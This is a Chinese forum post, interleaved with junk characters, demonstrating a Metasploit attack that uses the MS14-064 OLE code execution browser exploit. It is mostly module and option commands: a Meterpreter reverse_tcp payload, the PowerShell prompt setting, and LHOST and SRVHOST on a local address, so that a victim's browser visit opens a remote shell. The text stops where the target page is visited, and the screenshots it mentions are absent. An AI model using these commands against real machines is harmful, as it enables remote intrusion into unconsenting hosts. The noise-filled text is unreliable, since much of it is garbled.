; o0 f3 b' W+ b. j0 J5 g
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
. @4 S) S0 a2 p: }3 A; n7 U
1 R+ M/ ]2 q3 _5 z1 m5 k+ R+ y) o( Q1 |( r% @
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
( X2 G, h+ g: R# x: t
" a- k: K% S2 t; R
& J% f' M5 e& L, S4 N" o
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
# Z$ b9 R' ^$ \8 K/ x
3 {9 j X# s0 J4 d1 J) D4 c, T/ W3 x
$ z/ Z) N( Z. i+ }- j' \ set AllowPowershellPrompt true0 `9 x; ~8 _. [3 }$ a" }7 ^# V
5 l' q7 h1 S5 H% B p- {* N* E r
! X, |5 |5 H6 T4 Y" z Set LHOST 192.168.0.109% c ]: B) i( w& C6 R7 v
) r5 r% k) \ u5 D9 Q7 M
9 u; K9 [+ A. A+ O9 _; {
set SRVHOST 192.168.0.109/ j# v7 S+ r f) N/ B2 X
* _: G7 K9 z& @+ D& J6 R5 N' n; r5 n8 L. q) O- Z, C1 R
Set uripath share
6 x- u9 I3 R6 N
. m& {, o, u1 U) n; ^" H* y
' {* U# ^" j2 E, m; | v6 d
Set srvport 80
) f6 W- b; H- M) e/ m
. [5 g" `3 C) N: _9 [, I+ W1 @4 v
. M- j4 D7 }+ f' [- { ]
$ ]% e" x( ^ C6 Q# y% k
) G7 ^6 N! c# ?/ e0 a5 @5 W
1 L! R, S3 H2 w% y* a. K7 I- T
+ W' Q- o) ~; h1 {5 Z4 n
; r: { [+ C5 v; ]& Z' d
8 S# P* B+ ?% R" e; }
# b8 P+ V0 V$ |6 C1 r7 k6 E
7 u4 R8 D4 }* a
0 N3 m: S$ @: d% A
. l: P# N7 S) X+ X3 Y( w
5 g6 @- @+ R& P
6 @/ s$ S) J5 x3 _2 X! _; }$ Z! w7 v
# u" g( y ^+ w. Z# c: ]
4 D( I, Y3 \8 y( x, n" \) _
4 [ O! O( c* n; U4 h' J _( q& a 下面我们来访问本地地址如图:# w6 B+ p: s6 w) y7 B$ i
% E, F1 }: g% ^% a" Y2 x& d* A
& `$ i0 f$ @: e
9 H' u6 y k6 J! o# H1 w
( I& i" L+ U. n, n$ z( v: p+ s/ W, t5 x4 B1 b
7 g2 X2 _+ o9 q/ D
0 z' T, j2 C2 c: s1 P+ {
" G, _2 X% C# m2 S
) Q6 i3 O+ W2 o0 a